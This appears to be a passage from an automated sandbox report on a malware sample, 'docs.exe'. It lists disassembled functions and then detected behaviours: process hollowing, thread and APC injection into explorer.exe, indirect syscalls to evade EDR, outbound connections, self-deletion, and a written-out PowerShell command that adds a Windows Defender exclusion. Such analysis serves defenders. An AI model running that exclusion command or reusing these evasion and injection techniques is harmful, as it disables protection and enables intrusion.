          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7674D mov eax, dword ptr fs:[00000030h]5_2_00F7674D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7674D mov eax, dword ptr fs:[00000030h]5_2_00F7674D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7273C mov eax, dword ptr fs:[00000030h]5_2_00F7273C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7273C mov ecx, dword ptr fs:[00000030h]5_2_00F7273C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7273C mov eax, dword ptr fs:[00000030h]5_2_00F7273C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBC730 mov eax, dword ptr fs:[00000030h]5_2_00FBC730
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C720 mov eax, dword ptr fs:[00000030h]5_2_00F7C720
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C720 mov eax, dword ptr fs:[00000030h]5_2_00F7C720
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40710 mov eax, dword ptr fs:[00000030h]5_2_00F40710
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F70710 mov eax, dword ptr fs:[00000030h]5_2_00F70710
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C700 mov eax, dword ptr fs:[00000030h]5_2_00F7C700
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C8F9 mov eax, dword ptr fs:[00000030h]5_2_00F7C8F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7C8F9 mov eax, dword ptr fs:[00000030h]5_2_00F7C8F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6E8C0 mov eax, dword ptr fs:[00000030h]5_2_00F6E8C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014940 mov eax, dword ptr fs:[00000030h]5_2_01014940
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCC89D mov eax, dword ptr fs:[00000030h]5_2_00FCC89D
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40887 mov eax, dword ptr fs:[00000030h]5_2_00F40887
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD6870 mov eax, dword ptr fs:[00000030h]5_2_00FD6870
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD6870 mov eax, dword ptr fs:[00000030h]5_2_00FD6870
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCE872 mov eax, dword ptr fs:[00000030h]5_2_00FCE872
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCE872 mov eax, dword ptr fs:[00000030h]5_2_00FCE872
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F70854 mov eax, dword ptr fs:[00000030h]5_2_00F70854
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44859 mov eax, dword ptr fs:[00000030h]5_2_00F44859
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F44859 mov eax, dword ptr fs:[00000030h]5_2_00F44859
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F52840 mov ecx, dword ptr fs:[00000030h]5_2_00F52840
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62835 mov eax, dword ptr fs:[00000030h]5_2_00F62835
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62835 mov eax, dword ptr fs:[00000030h]5_2_00F62835
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62835 mov eax, dword ptr fs:[00000030h]5_2_00F62835
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62835 mov ecx, dword ptr fs:[00000030h]5_2_00F62835
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62835 mov eax, dword ptr fs:[00000030h]5_2_00F62835
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F62835 mov eax, dword ptr fs:[00000030h]5_2_00F62835
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE483A mov eax, dword ptr fs:[00000030h]5_2_00FE483A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE483A mov eax, dword ptr fs:[00000030h]5_2_00FE483A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7A830 mov eax, dword ptr fs:[00000030h]5_2_00F7A830
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100A9D3 mov eax, dword ptr fs:[00000030h]5_2_0100A9D3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCC810 mov eax, dword ptr fs:[00000030h]5_2_00FCC810
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F729F9 mov eax, dword ptr fs:[00000030h]5_2_00F729F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F729F9 mov eax, dword ptr fs:[00000030h]5_2_00F729F9
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCE9E0 mov eax, dword ptr fs:[00000030h]5_2_00FCE9E0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]5_2_00F4A9D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]5_2_00F4A9D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]5_2_00F4A9D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]5_2_00F4A9D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]5_2_00F4A9D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4A9D0 mov eax, dword ptr fs:[00000030h]5_2_00F4A9D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F749D0 mov eax, dword ptr fs:[00000030h]5_2_00F749D0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD69C0 mov eax, dword ptr fs:[00000030h]5_2_00FD69C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC89B3 mov esi, dword ptr fs:[00000030h]5_2_00FC89B3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC89B3 mov eax, dword ptr fs:[00000030h]5_2_00FC89B3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC89B3 mov eax, dword ptr fs:[00000030h]5_2_00FC89B3
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F529A0 mov eax, dword ptr fs:[00000030h]5_2_00F529A0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F409AD mov eax, dword ptr fs:[00000030h]5_2_00F409AD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F409AD mov eax, dword ptr fs:[00000030h]5_2_00F409AD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCC97C mov eax, dword ptr fs:[00000030h]5_2_00FCC97C
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE4978 mov eax, dword ptr fs:[00000030h]5_2_00FE4978
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE4978 mov eax, dword ptr fs:[00000030h]5_2_00FE4978
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F66962 mov eax, dword ptr fs:[00000030h]5_2_00F66962
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F66962 mov eax, dword ptr fs:[00000030h]5_2_00F66962
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F66962 mov eax, dword ptr fs:[00000030h]5_2_00F66962
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F8096E mov eax, dword ptr fs:[00000030h]5_2_00F8096E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F8096E mov edx, dword ptr fs:[00000030h]5_2_00F8096E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F8096E mov eax, dword ptr fs:[00000030h]5_2_00F8096E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC0946 mov eax, dword ptr fs:[00000030h]5_2_00FC0946
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_010108C0 mov eax, dword ptr fs:[00000030h]5_2_010108C0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FC892A mov eax, dword ptr fs:[00000030h]5_2_00FC892A
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD892B mov eax, dword ptr fs:[00000030h]5_2_00FD892B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100A8E4 mov eax, dword ptr fs:[00000030h]5_2_0100A8E4
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38918 mov eax, dword ptr fs:[00000030h]5_2_00F38918
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38918 mov eax, dword ptr fs:[00000030h]5_2_00F38918
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCC912 mov eax, dword ptr fs:[00000030h]5_2_00FCC912
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE908 mov eax, dword ptr fs:[00000030h]5_2_00FBE908
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBE908 mov eax, dword ptr fs:[00000030h]5_2_00FBE908
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014B00 mov eax, dword ptr fs:[00000030h]5_2_01014B00
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7AAEE mov eax, dword ptr fs:[00000030h]5_2_00F7AAEE
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7AAEE mov eax, dword ptr fs:[00000030h]5_2_00F7AAEE
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40AD0 mov eax, dword ptr fs:[00000030h]5_2_00F40AD0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F74AD0 mov eax, dword ptr fs:[00000030h]5_2_00F74AD0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F74AD0 mov eax, dword ptr fs:[00000030h]5_2_00F74AD0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01008B28 mov eax, dword ptr fs:[00000030h]5_2_01008B28
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01008B28 mov eax, dword ptr fs:[00000030h]5_2_01008B28
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F96ACC mov eax, dword ptr fs:[00000030h]5_2_00F96ACC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F96ACC mov eax, dword ptr fs:[00000030h]5_2_00F96ACC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F96ACC mov eax, dword ptr fs:[00000030h]5_2_00F96ACC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_0100AB40 mov eax, dword ptr fs:[00000030h]5_2_0100AB40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48AA0 mov eax, dword ptr fs:[00000030h]5_2_00F48AA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48AA0 mov eax, dword ptr fs:[00000030h]5_2_00F48AA0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01012B57 mov eax, dword ptr fs:[00000030h]5_2_01012B57
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01012B57 mov eax, dword ptr fs:[00000030h]5_2_01012B57
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01012B57 mov eax, dword ptr fs:[00000030h]5_2_01012B57
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01012B57 mov eax, dword ptr fs:[00000030h]5_2_01012B57
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F96AA4 mov eax, dword ptr fs:[00000030h]5_2_00F96AA4
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F78A90 mov edx, dword ptr fs:[00000030h]5_2_00F78A90
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F4EA80 mov eax, dword ptr fs:[00000030h]5_2_00F4EA80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBCA72 mov eax, dword ptr fs:[00000030h]5_2_00FBCA72
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FBCA72 mov eax, dword ptr fs:[00000030h]5_2_00FBCA72
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7CA6F mov eax, dword ptr fs:[00000030h]5_2_00F7CA6F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7CA6F mov eax, dword ptr fs:[00000030h]5_2_00F7CA6F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7CA6F mov eax, dword ptr fs:[00000030h]5_2_00F7CA6F
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEEA60 mov eax, dword ptr fs:[00000030h]5_2_00FEEA60
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F46A50 mov eax, dword ptr fs:[00000030h]5_2_00F46A50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50A5B mov eax, dword ptr fs:[00000030h]5_2_00F50A5B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50A5B mov eax, dword ptr fs:[00000030h]5_2_00F50A5B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F64A35 mov eax, dword ptr fs:[00000030h]5_2_00F64A35
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F64A35 mov eax, dword ptr fs:[00000030h]5_2_00F64A35
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7CA38 mov eax, dword ptr fs:[00000030h]5_2_00F7CA38
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F7CA24 mov eax, dword ptr fs:[00000030h]5_2_00F7CA24
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6EA2E mov eax, dword ptr fs:[00000030h]5_2_00F6EA2E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCCA11 mov eax, dword ptr fs:[00000030h]5_2_00FCCA11
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48BF0 mov eax, dword ptr fs:[00000030h]5_2_00F48BF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48BF0 mov eax, dword ptr fs:[00000030h]5_2_00F48BF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F48BF0 mov eax, dword ptr fs:[00000030h]5_2_00F48BF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6EBFC mov eax, dword ptr fs:[00000030h]5_2_00F6EBFC
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FCCBF0 mov eax, dword ptr fs:[00000030h]5_2_00FCCBF0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEEBD0 mov eax, dword ptr fs:[00000030h]5_2_00FEEBD0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40BCD mov eax, dword ptr fs:[00000030h]5_2_00F40BCD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40BCD mov eax, dword ptr fs:[00000030h]5_2_00F40BCD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F40BCD mov eax, dword ptr fs:[00000030h]5_2_00F40BCD
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F60BCB mov eax, dword ptr fs:[00000030h]5_2_00F60BCB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F60BCB mov eax, dword ptr fs:[00000030h]5_2_00F60BCB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F60BCB mov eax, dword ptr fs:[00000030h]5_2_00F60BCB
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50BBE mov eax, dword ptr fs:[00000030h]5_2_00F50BBE
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F50BBE mov eax, dword ptr fs:[00000030h]5_2_00F50BBE
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF4BB0 mov eax, dword ptr fs:[00000030h]5_2_00FF4BB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF4BB0 mov eax, dword ptr fs:[00000030h]5_2_00FF4BB0
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_01014A80 mov eax, dword ptr fs:[00000030h]5_2_01014A80
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F3CB7E mov eax, dword ptr fs:[00000030h]5_2_00F3CB7E
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F38B50 mov eax, dword ptr fs:[00000030h]5_2_00F38B50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FEEB50 mov eax, dword ptr fs:[00000030h]5_2_00FEEB50
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF4B4B mov eax, dword ptr fs:[00000030h]5_2_00FF4B4B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FF4B4B mov eax, dword ptr fs:[00000030h]5_2_00FF4B4B
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FE8B42 mov eax, dword ptr fs:[00000030h]5_2_00FE8B42
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD6B40 mov eax, dword ptr fs:[00000030h]5_2_00FD6B40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00FD6B40 mov eax, dword ptr fs:[00000030h]5_2_00FD6B40
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6EB20 mov eax, dword ptr fs:[00000030h]5_2_00F6EB20
          Source: C:\Users\user\Desktop\docs.exeCode function: 5_2_00F6EB20 mov eax, dword ptr fs:[00000030h]5_2_00F6EB20
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_005951D4 GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,8_2_005951D4
          Source: C:\Users\user\Desktop\docs.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 8_2_00597A38 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00597A38
          Source: C:\Users\user\Desktop\docs.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.26.122.70 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\docs.exeNtQueueApcThread: Indirect: 0xE5A4F2Jump to behavior
          Source: C:\Users\user\Desktop\docs.exeNtClose: Indirect: 0xE5A56C
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\docs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\docs.exeSection loaded: NULL target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\docs.exeThread register set: target process: 4004Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeThread register set: target process: 4004Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\docs.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\docs.exeSection unmapped: C:\Windows\SysWOW64\wscript.exe base address: 580000Jump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Source: C:\Users\user\Desktop\docs.exeProcess created: C:\Users\user\Desktop\docs.exe "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\docs.exe"Jump to behavior
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4598869980.00000000048E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4585859944.0000000000D60000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2150991767.0000000000D69000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: +Progman
          Source: explorer.exe, 00000006.00000000.2152514438.00000000013A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4587672310.00000000013A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000000.2158468861.00000000098AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3727331573.00000000098E3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.2979257324.00000000098AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd31A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: GetUserDefaultLCID,GetLocaleInfoW,GetModuleFileNameW,FreeLibrary,GetLocaleInfoA,LoadStringA,GetModuleFileNameA,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,GetUserDefaultLCID,GetLocaleInfoA,sprintf_s,CharNextA,memcpy,strcpy_s,LoadLibraryExA,LoadLibraryExA,8_2_0059544C
          Source: C:\Windows\SysWOW64\wscript.exeCode function: GetLocaleInfoW,wcsncmp,8_2_00597084
          Source: C:\Users\user\Desktop\docs.exeQueries volume information: C:\Users\user\Desktop\docs.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\docs.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\docs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
